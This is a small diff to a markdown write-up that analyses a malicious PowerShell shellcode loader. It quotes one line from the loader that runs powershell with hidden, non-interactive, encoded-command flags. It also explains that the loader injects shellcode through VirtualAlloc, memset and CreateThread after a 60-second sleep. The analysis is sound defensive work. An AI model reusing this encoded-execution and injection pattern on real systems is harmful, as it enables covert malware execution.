RG9n/RG9n.github.io/write-ups/pshellcode.md

 else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}
 ```

 Now that we have the powershell used, we can tell that they are attempting to inject their shellcode by calling 3 functions.
-They use the function VirtualAlloc() to create memory for the shellcode, then using memset() to copy in the shellcode, and finally creating a thread with CreateThread() to execute the shellcode after a 60 second sleep.
+They use the function VirtualAlloc() to create memory for the shellcode, then using memset() to copy in the shellcode, and finally creating a thread with CreateThread() to invoke the shellcode after a 60 second sleep.

 ## Shellcode